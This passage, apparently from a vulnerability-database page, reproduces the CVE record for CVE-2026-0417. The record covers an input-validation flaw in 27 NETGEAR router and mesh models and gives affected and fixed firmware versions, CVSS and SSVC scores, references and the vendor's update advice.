href=\"https://www.netgear.com/support/product/raxe450/\"\u003eV1.0.10.86\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAXE500\u003c/b\u003e Nighthawk AX12 12-Stream AXE11000 Tri-Band WiFi 6E Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/raxe500/\"\u003eV1.0.10.86\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eXR1000\u003c/b\u003e Nighthawk WiFi 6 Pro Gaming Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/xr1000/\"\u003eV1.0.0.68\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003c/tbody\u003e\u003c/table\u003e\u003cp\u003eModels marked (EoS) have reached End-of-Support phase, and no security updates are planned. NETGEAR strongly recommends that you retire these devices and upgrade to a newer NETGEAR device for continued security support.\u003c/p\u003e"
}
],
"value": "Devices with automatic updates enabled may already have this patch applied. If not, please check the firmware version and update it to the latest. Fixed in:\n\nProductFixed VersionMR60 Nighthawk Mesh WiFi 6 Router V1.1.7.132 https://www.netgear.com/support/product/mr60/ MR70 Nighthawk Mesh WiFi 6 Router V1.0.3.28 https://www.netgear.com/support/product/mr70/ MR80 Nighthawk Tri-band Mesh WiFi 6 Router V1.1.7.14 https://www.netgear.com/support/product/mr80/ MS60 Nighthawk Mesh WiFi 6 Add-on Satellite V1.1.7.132 https://www.netgear.com/support/product/ms60/ MS70 Nighthawk Mesh WiFi 6 Add-on Satellite V1.0.3.28 https://www.netgear.com/support/product/ms70/ MS80 Nighthawk Tri-band Mesh WiFi 6 Add-on Satellite V1.1.7.14 https://www.netgear.com/support/product/ms80/ R6400v2 (EoS) AC1750 Smart WiFi Router 802.11ac Dual Band Gigabit V1.0.4.128 https://www.netgear.com/support/product/r6400v2/ R6700v3 (EoS) Nighthawk AC1750 Smart WiFi Dual Band Gigabit Router V1.0.4.128 https://www.netgear.com/support/product/r6700v3/ R6900P (EoS) Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router V1.3.3.152 https://www.netgear.com/support/product/r6900p/ R7000 (EoS) Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router V1.0.11.216 https://www.netgear.com/support/product/r7000/ R7000P (EoS) Nighthawk AC2300 Smart WiFi Dual Band Gigabit Router V1.3.3.152 https://www.netgear.com/support/product/r7000p/ R7960P (EoS) Nighthawk X6S AC3600 Tri-Band WiFi Router V1.4.4.92 https://www.netgear.com/support/product/r7960p/ R8000P (EoS) Nighthawk X6S AC4000 Tri Band WiFi Router V1.4.4.92 https://www.netgear.com/support/product/r8000p/ R8500 (EoS) Nighthawk X8 AC5300 Smart WiFi RouterEOSRAX20 (EoS) 4-Stream AX1800 WiFi 6 Router V1.0.18.144 https://www.netgear.com/support/product/rax20/ RAX35v2 Nighthawk AX4 4-Stream AX3000 WiFi 6 RouterV1.0.16.132RAX40v2 Nighthawk AX4 4-Stream WiFi Router V1.0.12.118 https://www.netgear.com/support/product/rax40v2/ RAX41 (EoS) Nighthawk AX5 5-Stream AX3600 WiFi Router V1.0.12.118 https://www.netgear.com/support/product/rax41/ RAX42 (EoS) Nighthawk AX5 5-Stream AX4200 WiFi Router V1.0.12.118 https://www.netgear.com/support/product/rax42/ RAX43 (EoS) Nighthawk AX5 5-Stream AX4200 WiFi Router V1.0.12.120 https://www.netgear.com/support/product/rax43/ RAX45 (EoS) Nighthawk AX6 6-Stream AX4300 WiFi Router V1.0.12.118 https://www.netgear.com/support/product/rax45/ RAX48 Nighthawk AX6 6-Stream AX5200 WiFi 6 Router V1.0.12.118 https://www.netgear.com/support/product/rax48/ RAX50 Nighthawk AX6 6-Stream AX5400 WiFi 6 Router V1.0.12.120 https://www.netgear.com/support/product/rax50/ RAX50S Nighthawk AX6 6-Stream AX5400 WiFi 6 Router V1.0.12.120 https://www.netgear.com/support/product/rax50s/ RAXE450 Nighthawk AXE10000 Tri-Band WiFi 6E Router V1.0.10.86 https://www.netgear.com/support/product/raxe450/ RAXE500 Nighthawk AX12 12-Stream AXE11000 Tri-Band WiFi 6E Router V1.0.10.86 https://www.netgear.com/support/product/raxe500/ XR1000 Nighthawk WiFi 6 Pro Gaming Router V1.0.0.68 https://www.netgear.com/support/product/xr1000/ \n\nModels marked (EoS) have reached End-of-Support phase, and no security updates are planned. NETGEAR strongly recommends that you retire these devices and upgrade to a newer NETGEAR device for continued security support."
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Insufficient input validation in certain NETGEAR routers",
"x_generator": {
"engine": "Vulnogram 1.0.3"
}
}
},
"cveMetadata": {
"assignerOrgId": "a2826606-91e7-4eb6-899e-8484bd4575d5",
"assignerShortName": "NETGEAR",
"cveId": "CVE-2026-0417",
"datePublished": "2026-06-09T15:50:49.507Z",
"dateReserved": "2025-12-03T04:16:24.254Z",
"dateUpdated": "2026-06-10T15:49:33.259Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-0417 (GCVE-0-2026-0417)
Vulnerability from cvelistv5 – Published: 2026-06-09 15:50 – Updated: 2026-06-10 15:49
VLAI
Title
Insufficient input validation in certain NETGEAR routers
Summary
Insufficient input validation vulnerability in the listed NETGEAR devices allows
authenticated administrators connected to the local network to tamper with
the router's integrity.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-20 - Improper input validation
Assigner
References
28 references
Impacted products
27 products
| Vendor | Product | Version | |
|---|---|---|---|
| NETGEAR | MR60 |
Affected:
0 , < V1.1.7.132
(custom)
|
|
| NETGEAR | MR70 |
Affected:
0 , < V1.0.3.28
(custom)
|
|
| NETGEAR | MR80 |
Affected:
0 , < V1.1.7.14
(custom)
|
|
| NETGEAR | MS60 |
Affected:
0 , < V1.1.7.132
(custom)
|
|
| NETGEAR | MS70 |
Affected:
0 , < V1.0.3.28
(custom)
|
|
| NETGEAR | MS80 |
Affected:
0 , < V1.1.7.14
(custom)
|
|
| NETGEAR | R6400v2 |
Affected:
0 , < V1.0.4.128
(custom)
|
|
| NETGEAR | R6700v3 |
Affected:
0 , < V1.0.4.128
(custom)
|
|
| NETGEAR | R6900P |
Affected:
0 , < V1.3.3.152
(custom)
|
|
| NETGEAR | R7000 |
Affected:
0 , < V1.0.11.216
(custom)
|
|
| NETGEAR | R7000P |
Affected:
0 , < V1.3.3.152
(custom)
|
|
| NETGEAR | R7960P |
Affected:
0 , < V1.4.4.92
(custom)
|
|
| NETGEAR | R8000P |
Affected:
0 , < V1.4.4.92
(custom)
|
|
| NETGEAR | R8500 |
Affected:
0 , ≤ 1.0.2.160
(custom)
|
|
| NETGEAR | RAX20 |
Affected:
0 , < V1.0.18.144
(custom)
|
|
| NETGEAR | RAX35v2 |
Affected:
0 , < V1.0.16.132
(custom)
|
|
| NETGEAR | RAX40v2 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX41 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX42 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX43 |
Affected:
0 , < V1.0.12.120
(custom)
|
|
| NETGEAR | RAX45 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX48 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX50 |
Affected:
0 , < V1.0.12.120
(custom)
|
|
| NETGEAR | RAX50S |
Affected:
0 , < V1.0.12.120
(custom)
|
|
| NETGEAR | RAXE450 |
Affected:
0 , < V1.0.10.86
(custom)
|
|
| NETGEAR | RAXE500 |
Affected:
0 , < V1.0.10.86
(custom)
|
|
| NETGEAR | XR1000 |
Affected:
0 , < V1.0.0.68
(custom)
|
Date Public
2026-06-09 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-0417",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-09T17:10:42.291794Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-09T17:10:51.031Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "MR60",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.1.7.132",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MR70",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.3.28",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MR80",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.1.7.14",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MS60",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.1.7.132",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MS70",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.3.28",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MS80",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.1.7.14",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R6400v2",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.4.128",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R6700v3",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.4.128",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R6900P",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.3.3.152",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R7000",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.11.216",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R7000P",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.3.3.152",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R7960P",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.4.4.92",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R8000P",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.4.4.92",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R8500",
"vendor": "NETGEAR",
"versions": [
{
"lessThanOrEqual": "1.0.2.160",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX20",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.18.144",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX35v2",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.16.132",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX40v2",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX41",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX42",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX43",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.120",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX45",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX48",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX50",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.120",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX50S",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.120",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAXE450",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.10.86",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAXE500",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.10.86",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "XR1000",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.0.68",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "pjqwudi"
}
],
"datePublic": "2026-06-09T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cdiv\u003eInsufficient input validation vulnerability in the listed NETGEAR\u0026nbsp;devices\u0026nbsp;allows\nauthenticated administrators connected to the local network to\u0026nbsp;tamper with\nthe router\u0027s integrity. \u003cbr\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cp\u003e\u003cbr\u003e\u003c/p\u003e"
}
],
"value": "Insufficient input validation vulnerability in the listed NETGEAR\u00a0devices\u00a0allows\nauthenticated administrators connected to the local network to\u00a0tamper with\nthe router\u0027s integrity."
}
],
"impacts": [
{
"capecId": "CAPEC-122",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-122 Privilege Abuse"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "ADJACENT",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"exploitMaturity": "UNREPORTED",
"privilegesRequired": "HIGH",
"providerUrgency": "AMBER",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "DIFFUSE",
"vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U/V:D/RE:L/U:Amber",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "LOW"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20 Improper input validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-10T15:49:33.259Z",
"orgId": "a2826606-91e7-4eb6-899e-8484bd4575d5",
"shortName": "NETGEAR"
},
"references": [
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/mr70/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/mr80/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/mr60/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/ms60/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/ms80/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r6400v2/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/ms70/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r6700v3/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r7000/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r6900p/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r8000p/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r8500/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax40v2/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax42/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax35v2/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax41/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax20/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax43/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r7960p/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r7000p/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax45/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax48/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/raxe450/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax50s/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/xr1000/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax50/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/raxe500/"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://kb.netgear.com/000070811/June-2026-NETGEAR-Security-Advisory"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eDevices with automatic updates enabled may already have this patch applied. If not, please check the firmware version and update it to the latest. Fixed in:\u003c/p\u003e\u003ctable\u003e\u003cthead\u003e\u003ctr\u003e\u003cth\u003eProduct\u003c/th\u003e\u003cth\u003eFixed Version\u003c/th\u003e\u003c/tr\u003e\u003c/thead\u003e\u003ctbody\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMR60\u003c/b\u003e Nighthawk Mesh WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/mr60/\"\u003eV1.1.7.132\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMR70\u003c/b\u003e Nighthawk Mesh WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/mr70/\"\u003eV1.0.3.28\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMR80\u003c/b\u003e Nighthawk Tri-band Mesh WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/mr80/\"\u003eV1.1.7.14\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMS60\u003c/b\u003e Nighthawk Mesh WiFi 6 Add-on Satellite\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/ms60/\"\u003eV1.1.7.132\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMS70\u003c/b\u003e Nighthawk Mesh WiFi 6 Add-on Satellite\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/ms70/\"\u003eV1.0.3.28\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMS80\u003c/b\u003e Nighthawk Tri-band Mesh WiFi 6 Add-on Satellite\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/ms80/\"\u003eV1.1.7.14\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR6400v2 (EoS)\u003c/b\u003e AC1750 Smart WiFi Router 802.11ac Dual Band Gigabit\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r6400v2/\"\u003eV1.0.4.128\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR6700v3 (EoS)\u003c/b\u003e Nighthawk AC1750 Smart WiFi Dual Band Gigabit Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r6700v3/\"\u003eV1.0.4.128\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR6900P (EoS)\u003c/b\u003e Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r6900p/\"\u003eV1.3.3.152\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR7000 (EoS)\u003c/b\u003e Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r7000/\"\u003eV1.0.11.216\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR7000P (EoS)\u003c/b\u003e Nighthawk AC2300 Smart WiFi Dual Band Gigabit Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r7000p/\"\u003eV1.3.3.152\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR7960P (EoS)\u003c/b\u003e Nighthawk X6S AC3600 Tri-Band WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r7960p/\"\u003eV1.4.4.92\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR8000P (EoS)\u003c/b\u003e Nighthawk X6S AC4000 Tri Band WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r8000p/\"\u003eV1.4.4.92\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR8500 (EoS)\u003c/b\u003e Nighthawk X8 AC5300 Smart WiFi Router\u003c/td\u003e\u003ctd\u003eEOS\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX20 (EoS)\u003c/b\u003e 4-Stream AX1800 WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax20/\"\u003eV1.0.18.144\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX35v2\u003c/b\u003e Nighthawk AX4 4-Stream AX3000 WiFi 6 Router\u003c/td\u003e\u003ctd\u003eV1.0.16.132\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX40v2\u003c/b\u003e Nighthawk AX4 4-Stream WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax40v2/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX41 (EoS)\u003c/b\u003e Nighthawk AX5 5-Stream AX3600 WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax41/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX42 (EoS)\u003c/b\u003e Nighthawk AX5 5-Stream AX4200 WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax42/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX43 (EoS)\u003c/b\u003e Nighthawk AX5 5-Stream AX4200 WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax43/\"\u003eV1.0.12.120\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX45 (EoS)\u003c/b\u003e Nighthawk AX6 6-Stream AX4300 WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax45/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX48\u003c/b\u003e Nighthawk AX6 6-Stream AX5200 WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax48/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX50\u003c/b\u003e Nighthawk AX6 6-Stream AX5400 WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax50/\"\u003eV1.0.12.120\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX50S\u003c/b\u003e Nighthawk AX6 6-Stream AX5400 WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax50s/\"\u003eV1.0.12.120\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAXE450\u003c/b\u003e Nighthawk AXE10000 Tri-Band WiFi 6E Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/raxe450/\"\u003eV1.0.10.86\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAXE500\u003c/b\u003e Nighthawk AX12 12-Stream AXE11000 Tri-Band WiFi 6E Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/raxe500/\"\u003eV1.0.10.86\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eXR1000\u003c/b\u003e Nighthawk WiFi 6 Pro Gaming Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/xr1000/\"\u003eV1.0.0.68\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003c/tbody\u003e\u003c/table\u003e\u003cp\u003eModels marked (EoS) have reached End-of-Support phase, and no security updates are planned. NETGEAR strongly recommends that you retire these devices and upgrade to a newer NETGEAR device for continued security support.\u003c/p\u003e"
}
],
"value": "Devices with automatic updates enabled may already have this patch applied. If not, please check the firmware version and update it to the latest. Fixed in:\n\nProductFixed VersionMR60 Nighthawk Mesh WiFi 6 Router V1.1.7.132 https://www.netgear.com/support/product/mr60/ MR70 Nighthawk Mesh WiFi 6 Router V1.0.3.28 https://www.netgear.com/support/product/mr70/ MR80 Nighthawk Tri-band Mesh WiFi 6 Router V1.1.7.14 https://www.netgear.com/support/product/mr80/ MS60 Nighthawk Mesh WiFi 6 Add-on Satellite V1.1.7.132 https://www.netgear.com/support/product/ms60/ MS70 Nighthawk Mesh WiFi 6 Add-on Satellite V1.0.3.28 https://www.netgear.com/support/product/ms70/ MS80 Nighthawk Tri-band Mesh WiFi 6 Add-on Satellite V1.1.7.14 https://www.netgear.com/support/product/ms80/ R6400v2 (EoS) AC1750 Smart WiFi Router 802.11ac Dual Band Gigabit V1.0.4.128 https://www.netgear.com/support/product/r6400v2/ R6700v3 (EoS) Nighthawk AC1750 Smart WiFi Dual Band Gigabit Router V1.0.4.128 https://www.netgear.com/support/product/r6700v3/ R6900P (EoS) Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router V1.3.3.152 https://www.netgear.com/support/product/r6900p/ R7000 (EoS) Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router V1.0.11.216 https://www.netgear.com/support/product/r7000/ R7000P (EoS) Nighthawk AC2300 Smart WiFi Dual Band Gigabit Router V1.3.3.152 https://www.netgear.com/support/product/r7000p/ R7960P (EoS) Nighthawk X6S AC3600 Tri-Band WiFi Router V1.4.4.92 https://www.netgear.com/support/product/r7960p/ R8000P (EoS) Nighthawk X6S AC4000 Tri Band WiFi Router V1.4.4.92 https://www.netgear.com/support/product/r8000p/ R8500 (EoS) Nighthawk X8 AC5300 Smart WiFi RouterEOSRAX20 (EoS) 4-Stream AX1800 WiFi 6 Router V1.0.18.144 